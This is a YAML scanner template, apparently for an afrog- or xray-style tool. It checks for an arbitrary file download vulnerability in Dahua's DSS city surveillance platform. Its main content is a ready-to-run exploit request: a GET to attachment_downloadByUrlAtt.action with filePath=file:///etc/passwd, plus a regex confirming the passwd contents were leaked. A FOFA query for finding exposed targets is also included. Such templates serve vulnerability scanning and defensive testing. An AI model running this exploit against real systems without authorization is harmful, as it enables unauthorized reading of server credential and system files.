id: dahua-dss-file-read

info:
  name: "大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞"
  author: zan8in
  severity: high
  verified: true
  description: |
      大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件
      FOFA: app="dahua-DSS"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/%E5%A4%A7%E5%8D%8E/%E5%A4%A7%E5%8D%8E%20%E5%9F%8E%E5%B8%82%E5%AE%89%E9%98%B2%E7%9B%91%E6%8E%A7%E7%B3%BB%E7%BB%9F%E5%B9%B3%E5%8F%B0%E7%AE%A1%E7%90%86%20attachment_downloadByUrlAtt.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.html

rules:
    r0:
        request:
            method: GET
            path: "/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd"
        expression: |
            response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()